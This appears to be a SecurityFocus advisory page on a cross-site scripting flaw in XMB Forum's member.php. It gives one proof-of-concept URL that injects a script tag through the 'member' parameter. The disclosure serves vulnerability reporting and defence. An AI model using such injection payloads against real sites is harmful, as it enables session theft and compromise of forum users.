XMB Forum Member.PHP Cross-Site Scripting Vulnerability

The following proof of concept has been provided by Marc Ruef <marc.ruef@computec.ch>:

http://www.example.com/forum/member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C/font%3E%3Cscript%3Ealert(%22Ruef%22);%3C/script%3E%3C/div%3E


 

Privacy Statement
Copyright 2010, SecurityFocus